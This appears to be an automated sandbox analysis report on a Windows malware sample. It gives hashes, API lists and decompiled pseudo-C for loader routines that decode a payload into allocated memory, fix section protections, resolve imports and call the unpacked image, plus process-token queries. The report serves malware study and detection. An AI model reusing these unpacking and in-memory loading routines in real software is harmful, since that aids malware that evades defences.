Opcode ID: 94dce5a4a244bf46c1703a7fe52d72098bc57d288deaf02f388794b2180ee190
Instruction ID: 161ffaa1194924a99c138dd5118ba0e7a78cdab7fcafee615c6d43cfe7a01a7b
Opcode Fuzzy Hash: 94dce5a4a244bf46c1703a7fe52d72098bc57d288deaf02f388794b2180ee190
Instruction Fuzzy Hash: 53F05E32201220BBD7325BA2AC1CF5BBEE8FB48B11F004444F6859E155C73A89108B91

Uniqueness

Uniqueness Score: -1.00%

Function 01117A60, Relevance: 7.8, APIs: 5, Instructions: 327COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,00000718), ref: 01117AC8
GetCurrentDirectoryA.KERNEL32(00000718,?,0115300C), ref: 01117BB6
delete.LIBCMTD ref: 01117EB5
std::_Lockit::_Lockit.LIBCPMTD ref: 01117ED4
std::_Lockit::~_Lockit.LIBCPMTD ref: 01117EFF

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: DirectoryLockitstd::_$CurrentLockit::_Lockit::~_Systemdelete
String ID:
API String ID: 4219208524-0
Opcode ID: e095edfeb41d28dbe7c5378a1d48cd56525ab27cee0a4e953831691a42689230
Instruction ID: 294047db664ccba61e4f8616b9be6ab6a78791cc50123f02b3bff8d24cdc0769
Opcode Fuzzy Hash: e095edfeb41d28dbe7c5378a1d48cd56525ab27cee0a4e953831691a42689230
Instruction Fuzzy Hash: 75D16C71A24305CFC72DCF28E990A6AFBA5B784394B44853ED5358738CE770A589CF92

Uniqueness

Uniqueness Score: -1.00%

Function 010E18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E010E18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x10e41b0;
				_t50 = E010E1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x10e41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x10e5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x10e41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x010e18b4
0x010e18c4
0x010e18cb
0x010e18ce
0x010e18e3
0x010e18ea
0x010e18ef
0x010e1900
0x010e1903
0x010e1909
0x010e190d
0x010e1910
0x010e19ec
0x010e1916
0x010e1916
0x010e191a
0x010e19b2
0x010e1920
0x010e1921
0x010e1926
0x010e1929
0x010e192c
0x010e192c
0x010e1933
0x010e1936
0x010e193e
0x010e193f
0x010e1940
0x010e1947
0x010e194b
0x010e1951
0x010e1955
0x010e1957
0x010e195b
0x010e195e
0x010e1965
0x010e1968
0x010e196d
0x010e1970
0x010e1986
0x010e1972
0x010e197c
0x010e197e
0x010e1981
0x010e1981
0x010e198d
0x010e198d
0x010e198d
0x010e1965
0x010e1998
0x010e199b
0x010e199e
0x010e19a7
0x010e19a7
0x010e19af
0x010e19be
0x010e19d3
0x010e19c0
0x010e19c9
0x010e19ce
0x010e19e4
0x010e19e4
0x010e19f3
0x010e19f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 010E1903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 010E19C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 010E19E4

Strings

Jun 6 2021, xrefs: 010E1936

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: f30790e4518008c6e28c534cfe1acc8a75c23def9bdebb078829c034609d49c9
Instruction ID: 42dc331fa5ebc2538278a3d330eb6b2bfd00cf399672469d4cb6a67d8aaa3b07
Opcode Fuzzy Hash: f30790e4518008c6e28c534cfe1acc8a75c23def9bdebb078829c034609d49c9
Instruction Fuzzy Hash: C4415C71E0021AAFDF14CF9AD884AEEBBF5BF48310F148169E944BB244D775AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010E20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E010E20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E010E1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x010e20d7
0x010e20dc
0x010e20ea
0x010e20ef
0x010e20ef
0x010e20f5
0x010e20fa
0x010e20fe
0x010e2102
0x010e2102
0x010e210c
0x010e2115

APIs

GetCurrentThread.KERNEL32 ref: 010E20D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 010E20DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 010E20EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 010E2102

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: da5b88c5844b1c9fa24dab44651c727f18da07434e2b8176e6734783521d599c
Instruction ID: 981e9aa28e46e46a69e74fb0120027bff9e3d26becc7b16bc52bff4af3cf7f2e
Opcode Fuzzy Hash: da5b88c5844b1c9fa24dab44651c727f18da07434e2b8176e6734783521d599c
Instruction Fuzzy Hash: 48E092313056113FA6326A2F5C98EBBAFDCEF916307050265F664DB1D0CFA98C058AA5

Uniqueness

Uniqueness Score: -1.00%

Function 010E126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E010E126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x10e41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x010e1277
0x010e1284
0x010e128a
0x010e1296
0x010e12a6
0x010e12a8
0x010e12b0
0x010e1345
0x010e134c
0x00000000
0x00000000
0x00000000
0x010e12b6
0x010e12b6
0x010e12b6
0x010e12ba
0x00000000
0x00000000
0x010e12c6
0x010e12ca
0x010e12ee
0x010e12f2
0x010e1306
0x010e1306
0x010e130c
0x010e131b
0x010e131f
0x010e1327
0x010e1327
0x010e132f
0x010e1332
0x010e133f
0x00000000
0x00000000
0x00000000
0x00000000
0x010e133f
0x010e12fa
0x010e12fe
0x010e1304
0x00000000
0x00000000
0x00000000
0x010e1304
0x010e12d2
0x010e12d6
0x010e12e0
0x010e12d8
0x010e12d8
0x010e12d8
0x00000000
0x010e12d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 010E12A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 010E131B
GetLastError.KERNEL32 ref: 010E1321

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: f769aba1a0c47dcd3d39744d360077c8e29044c73b63cdbecff266d506b973c6
Instruction ID: 073af1020130654606b01952a5f44deb76893960eb6d7153d9d4450941f2b572
Opcode Fuzzy Hash: f769aba1a0c47dcd3d39744d360077c8e29044c73b63cdbecff266d506b973c6
Instruction Fuzzy Hash: 7321A371800206EFCB14CFA6C885EEAF7F5FF08319F008999D052D7485E3B8A694CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010E14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E010E14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x10e41c4);
				_push(1);
				_push( *0x10e41d0 + 0x10e5089);
				 *0x10e41c0 = 0xc;
				 *0x10e41c8 = 0; // executed
				L010E1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E010E1697( &_v44,  &_v28,  *0x10e41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x10e41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E010E1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x10e41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E010E2118(_t40, _t30 + 4);
					}
				}
				_t23 = E010E1444(_v44); // executed
				goto L7;
			}

0x010e14fa
0x010e14fb
0x010e1500
0x010e1508
0x010e1509
0x010e1513
0x010e1519
0x010e1522
0x010e1527
0x010e1545
0x010e159a
0x010e159b
0x010e159c
0x010e159c
0x010e154d
0x010e1553
0x010e1561
0x010e1565
0x010e156c
0x010e1574
0x010e1578
0x010e157a
0x010e1589
0x010e157c
0x010e1582
0x010e1582
0x010e157a
0x010e1591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,010E41C4,00000000), ref: 010E1519
lstrlenW.KERNEL32(?,?,?), ref: 010E154D

Part of subcall function 010E1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?,?), ref: 010E1151
Part of subcall function 010E1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010E1167
Part of subcall function 010E1144: _snwprintf.NTDLL ref: 010E118C
Part of subcall function 010E1144: CreateFileMappingW.KERNELBASE(000000FF,010E41C0,00000004,00000000,?,?), ref: 010E11B1
Part of subcall function 010E1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?), ref: 010E11C8
Part of subcall function 010E1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A), ref: 010E11FD

ExitThread.KERNEL32 ref: 010E159C

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 426ca205f9d0ad1cc85ab9e18430b1bdca2f600a87113e76f4bc8473d7722714
Instruction ID: 74e926c56152b95262b3eb597cdaff9a5e902af8b1cedef800169b50cdb0d2bd
Opcode Fuzzy Hash: 426ca205f9d0ad1cc85ab9e18430b1bdca2f600a87113e76f4bc8473d7722714
Instruction Fuzzy Hash: 58118B72604305EFDB21DF66C888E9BBBECBB54B00F0509A6F195DB140DB36E5448B92

Uniqueness

Uniqueness Score: -1.00%

Function 01120860, Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(011681A8,00000000,00000001), ref: 011208B6

Part of subcall function 01123490: ___crtCorExitProcess.LIBCMTD ref: 01123497
Part of subcall function 01123490: ExitProcess.KERNEL32 ref: 011234A3

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: ExitProcess$AllocateHeap___crt
String ID:
API String ID: 2561786895-0
Opcode ID: d338cfeff990c3c95b2079cbb88751025a4d65e28de769f89b1e0beab28650c5
Instruction ID: e39a5aed141c5ac2618ed5e62e0833ce350bdce4f9a0b0125503ecd0897103ad
Opcode Fuzzy Hash: d338cfeff990c3c95b2079cbb88751025a4d65e28de769f89b1e0beab28650c5
Instruction Fuzzy Hash: 95114674D00358EFEF2CDFA4E8487AA7B74AB08319F104225F9154B285D7B19AE4CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 011D5685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x11da294) == 0) {
						E011D5076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x11da294) == 1) {
						_t10 = E011D6B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x011d568c
0x011d568d
0x011d5690
0x011d56c2
0x011d56c4
0x011d56c4
0x011d5692
0x011d5693
0x011d56a8
0x011d56af
0x011d56b1
0x011d56b1
0x011d56af
0x011d5693
0x011d56cc

APIs

InterlockedIncrement.KERNEL32(011DA294), ref: 011D569A

Part of subcall function 011D6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 011D6B24

InterlockedDecrement.KERNEL32(011DA294), ref: 011D56BA

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 750640776e6e2a7564a303b680c7f3765af8c45685e2ae5302ae54f77b01791a
Instruction ID: 1acb7a85e6f3e1a81db22bb3b066a45741c9d89866e9de806bb144e2e5649a5f
Opcode Fuzzy Hash: 750640776e6e2a7564a303b680c7f3765af8c45685e2ae5302ae54f77b01791a
Instruction Fuzzy Hash: 66E04F3574523257D7BE6A69B804BBE6E76AF11A84B018524A595D106CE710D840C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 010E1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E010E1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E010E1697( &_v8,  &_v12,  *0x10e41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E010E2087(_t22, _v8,  *0x10e41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E010E1E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x10e4190, 0, _v8);
				}
				return _t25;
			}

0x010e1adb
0x010e1ade
0x010e1adf
0x010e1af5
0x010e1afe
0x010e1b03
0x010e1b1c
0x010e1b05
0x010e1b18
0x010e1b18
0x010e1b20
0x010e1b22
0x010e1b2a
0x010e1b32
0x010e1b3a
0x010e1b3c
0x010e1b3c
0x010e1b3a
0x010e1b4c
0x010e1b4c
0x010e1b57

APIs

StrStrIA.KERNELBASE(00000000,010E1CE6,?,010E1CE6,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1B32
HeapFree.KERNEL32(00000000,?,?,010E1CE6,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1B4C

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8d1499acd6a471ebffd7466f7c1fe07b9839242dda903486a69a3539bac9978c
Instruction ID: ab77067633926b73b825cea167e19cefc228e69d96c2287097d917b60b0c971b
Opcode Fuzzy Hash: 8d1499acd6a471ebffd7466f7c1fe07b9839242dda903486a69a3539bac9978c
Instruction Fuzzy Hash: A2018476A01115FFDF219BA7DC48E9FBFEDEB94640F1441A1BA80EB144E635DA008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0111FDE0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0111FDE5

Part of subcall function 0111FD50: TlsGetValue.KERNEL32(01153D3C,00000000), ref: 0111FD63
Part of subcall function 0111FD50: TlsGetValue.KERNEL32(01153D3C,01153D38), ref: 0111FD84
Part of subcall function 0111FD50: GetModuleHandleA.KERNEL32(0114C518), ref: 0111FD9A
Part of subcall function 0111FD50: GetProcAddress.KERNEL32(00000000,0114C508), ref: 0111FDB2
Part of subcall function 0111FD50: RtlEncodePointer.NTDLL(?), ref: 0111FDD3

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__encode_pointer
String ID:
API String ID: 1150849369-0
Opcode ID: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction ID: 220f4b9c3e7e665004567d0e0a7a5393a1a4f36f8f976271b5d6d9211cc211b1
Opcode Fuzzy Hash: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction Fuzzy Hash: 34A022A288830F23E80030C23C0BB2AB20C032083CF880030EA0C082A2B883B02800E3

Uniqueness

Uniqueness Score: -1.00%

Function 010E1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010E1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x10e41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10e41cc - 0x63698bc4 &  !( *0x10e41cc - 0x63698bc4);
				_t18 = E010E1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10e41cc - 0x63698bc4 &  !( *0x10e41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10e41cc - 0x63698bc4 &  !( *0x10e41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E010E1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E010E1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E010E126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E010E142F(_t42);
					L8:
					return _t29;
				}
			}

0x010e144c
0x010e144e
0x010e146a
0x010e147b
0x010e1482
0x010e14e0
0x00000000
0x010e1484
0x010e1484
0x010e148e
0x010e1492
0x010e1497
0x010e149a
0x010e149f
0x010e14a3
0x010e14a8
0x010e14ad
0x010e14b1
0x010e14b6
0x010e14b7
0x010e14bb
0x010e14c0
0x010e14c8
0x010e14c8
0x010e14c0
0x010e14b1
0x010e14a3
0x010e14ca
0x010e14d3
0x010e14d7
0x010e14e1
0x010e14e7
0x010e14e7

APIs

Part of subcall function 010E1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,010E1480,?,?,?,?,00000002,00000000,?,?), ref: 010E1084
Part of subcall function 010E1060: GetProcAddress.KERNEL32(00000000,?), ref: 010E10A6
Part of subcall function 010E1060: GetProcAddress.KERNEL32(00000000,?), ref: 010E10BC
Part of subcall function 010E1060: GetProcAddress.KERNEL32(00000000,?), ref: 010E10D2
Part of subcall function 010E1060: GetProcAddress.KERNEL32(00000000,?), ref: 010E10E8
Part of subcall function 010E1060: GetProcAddress.KERNEL32(00000000,?), ref: 010E10FE

Part of subcall function 010E1A5A: memcpy.NTDLL(00000000,00000002,010E148E,?,?,?,?,?,010E148E,?,?,?,?,?,?,00000002), ref: 010E1A87
Part of subcall function 010E1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 010E1ABA

Part of subcall function 010E1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 010E1FB4

Part of subcall function 010E126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 010E12A6
Part of subcall function 010E126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 010E131B
Part of subcall function 010E126D: GetLastError.KERNEL32 ref: 010E1321

GetLastError.KERNEL32(?,?), ref: 010E14C2

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: c8fc4c8d228493961f6e4729fb07336ed009113afa623390ce23468bdcd7bffd
Instruction ID: 33dbe49efec620a41304584e6df8fcb3ac2e131a982d21252e61ec1485e1f64b
Opcode Fuzzy Hash: c8fc4c8d228493961f6e4729fb07336ed009113afa623390ce23468bdcd7bffd
Instruction Fuzzy Hash: B71152B63013066FD7219AAA8C84DEB77FCBF441047044054E981D7241EEB0ED024790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011D2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E011D2D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43);
						_t44 = E011D6837(_a4);
						if(_t44 != 0) {
							_push( &_a4);
							_push(_a4);
							_push(_t44);
							_push(1);
							_push(_v8);
							if( *_t47() >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E011D50CA(_t44);
						}
						NtClose(_v8);
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x011d2d13
0x011d2d14
0x011d2d15
0x011d2d16
0x011d2d17
0x011d2d1b
0x011d2d22
0x011d2d31
0x011d2d34
0x011d2d37
0x011d2d3e
0x011d2d41
0x011d2d44
0x011d2d47
0x011d2d4a
0x011d2d55
0x011d2d57
0x011d2d60
0x011d2d68
0x011d2d6a
0x011d2d7c
0x011d2d86
0x011d2d8a
0x011d2d8f
0x011d2d90
0x011d2d93
0x011d2d94
0x011d2d96
0x011d2d9d
0x011d2da6
0x011d2dae
0x011d2dae
0x011d2db0
0x011d2db0
0x011d2db8
0x011d2dbe
0x011d2dc2
0x011d2dc2
0x011d2dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 011D2D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 011D2D60
